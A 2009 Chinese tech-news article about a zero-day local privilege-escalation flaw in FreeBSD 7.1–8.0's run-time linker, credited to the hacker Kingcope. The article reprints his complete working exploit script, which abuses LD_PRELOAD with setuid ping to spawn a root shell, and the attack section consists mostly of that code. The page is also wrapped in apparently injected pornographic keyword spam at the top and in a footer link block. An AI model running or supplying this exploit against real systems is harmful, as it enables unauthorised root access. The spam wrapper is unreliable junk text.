成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

FreeBSD 7.1到8.0皆有漏洞 可獲root權(quán)限堪稱圣誕禮物

安全 系統(tǒng)
據(jù)Kingcope所說,他長期致力于挖掘FreeBSD系統(tǒng)的本地提權(quán)漏洞,終于有幸在近期發(fā)現(xiàn)了這個非常低級的本地提權(quán)漏洞;這個漏洞存在于FreeBSD的Run-Time Link-Editor(rtld)程序中,普通用戶可以通過該漏洞非常輕易的獲得root權(quán)限。該漏洞影響非常廣泛,包括FreeBSD 7.1至8.0的32及64位系統(tǒng)。
在圣誕節(jié)即將到來的日子,以安全著稱的FreeBSD系統(tǒng)被著名黑客Kingcope爆了一個零日(0day)漏洞。據(jù)Kingcope所說,他長期致力于挖掘FreeBSD系統(tǒng)的本地提權(quán)漏洞,終于有幸在近期發(fā)現(xiàn)了這個非常低級的本地提權(quán)漏洞;這個漏洞存在于FreeBSD的Run-Time Link-Editor(rtld)程序中,普通用戶可以通過該漏洞非常輕易的獲得root權(quán)限。該漏洞影響非常廣泛,包括FreeBSD 7.1至8.0的32及64位系統(tǒng)。

在展示該漏洞威力之前,我們科普一下著名黑客kingcope。從2007年6月至今,他一共公開了12個安全漏洞(沒公開的不知道有多少),其中 FreeBSD和Sun Solaris各兩個,微軟四個,Oracle、mysql、NcFTPD和nginx各一個,同時他還編寫了多個漏洞的攻擊代碼,例如 Sun Solaris telnetd及近期的IIS FTPd、Debian OpenSSH等。

接下來我們在最新的FreeBSD 8.0中重現(xiàn)一下該漏洞的攻擊過程,請注意圖中的紅色部分;我們只要執(zhí)行名為fbsd8localroot.sh的腳本,就可以輕易的獲得root權(quán)限。

fbsd8localroot



相關(guān)腳本如下:

#!/bin/sh
echo “FreeBSD local r00t zeroday by Kingcope on November 2009″
cat > env.c << _EOF
#include
main() {
       extern char **environ;
       environ = (char**)malloc(8096);
       environ[0] = (char*)malloc(1024);
       environ[1] = (char*)malloc(1024);
       strcpy(environ[1], “LD_PRELOAD=/tmp/w00t.so.1.0″);
       execl(”/sbin/ping”, “ping”, 0);
}
_EOF
gcc env.c -o env > /dev/null 2>&1
#download from baoz.net
cat > program.c << _EOF
#include
#include
#include
#include
void _init() {
       extern char **environ;
       environ=NULL;
       system(”echo ALEX-ALEX;/bin/sh”);
}
_EOF
gcc -o program.o -c program.c -fPIC ; gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles ; cp w00t.so.1.0 /tmp/w00t.so.1.0 ;./env

FreeBSD尚未就該0day漏洞發(fā)布安全公告及官方補(bǔ)丁,敬請關(guān)注素包子的博客http://baoz.net/freebsd8-localroot-0day/以獲取該漏洞的最新情況。

【編輯推薦】

  1. FreeBSD 7.1到8.0皆有漏洞 可獲root權(quán)限堪稱圣誕禮物
  2. FreeBSD下的強(qiáng)制訪問控制體系 TrustedBSD MAC使用教程
  3. 應(yīng)用防火墻的下一代
  4. 如何自己打造高性能寬帶路由防火墻
  5. 提高管理與維護(hù)水平 企業(yè)網(wǎng)絡(luò)防火墻管理經(jīng)驗談
  6. 合理設(shè)置Vista系統(tǒng)防火墻讓其獨當(dāng)一面
  7. 簡單三步幫助企業(yè)解決Web業(yè)務(wù)安全防護(hù)問題
  8. 如何選擇合適的Web安全網(wǎng)關(guān)
  9. Web準(zhǔn)入認(rèn)證—破除802.1x部署之爭
  10. Web應(yīng)用安全技巧
責(zé)任編輯:王文文 來源: 51CTO.com
相關(guān)推薦

2009-12-04 19:29:33

2020-12-25 07:54:23

Windows10操作系統(tǒng)漏洞

2014-12-22 11:10:06

LG

2015-12-28 10:17:36

2009-11-26 10:52:55

LinuxChrome OS

2009-12-04 19:14:50

2016-11-14 13:50:56

2019-12-30 12:15:53

戴爾

2009-12-25 10:01:12

谷歌員工

2018-12-25 23:46:33

開發(fā)者技能開源

2015-05-07 10:48:32

2019-12-19 17:20:31

程序員機(jī)器人語言

2024-12-17 16:09:36

2024-10-23 15:58:17

2021-07-21 20:24:29

Linux內(nèi)核漏洞權(quán)限

2017-12-27 14:15:47

大數(shù)據(jù)數(shù)據(jù)分析圣誕

2019-12-26 16:49:20

華為

2024-12-26 16:53:50

2011-12-19 20:05:36

iOS

2024-01-09 11:29:40

點贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 91久久国产综合久久91精品网站 | 免费在线观看成年人视频 | 国产精品伦一区二区三级视频 | 在线免费观看日本 | 91九色麻豆| 日韩视频一区在线观看 | 亚洲免费在线播放 | 在线观看一区 | 欧美在线一区二区三区 | 金莲网| 99久久免费精品国产免费高清 | www国产成人免费观看视频,深夜成人网 | 久草热视频 | 日本久久精品 | 国产国产精品 | 亚洲高清视频一区二区 | 欧美一级艳情片免费观看 | 亚洲精品短视频 | 欧美日本一区 | 99久久国产 | 国产精品福利在线 | 国产电影一区二区 | av黄色在线 | 精品国产乱码久久久久久图片 | 一区二区三区国产在线观看 | 丝袜美腿一区二区三区动态图 | 国产精品久久久久无码av | 日韩视频一区二区 | 中文字幕高清在线 | 国产精品美女久久久久久免费 | 欧美一区二区三区四区五区无卡码 | 亚洲国产一区二区三区在线观看 | 性做久久久久久免费观看欧美 | 成人h视频在线 | 四色成人av永久网址 | 国产黄色免费网站 | 嫩草网| 91色网站 | 中文字幕视频免费 | 国产欧美日韩精品在线观看 | 夜夜夜夜草 |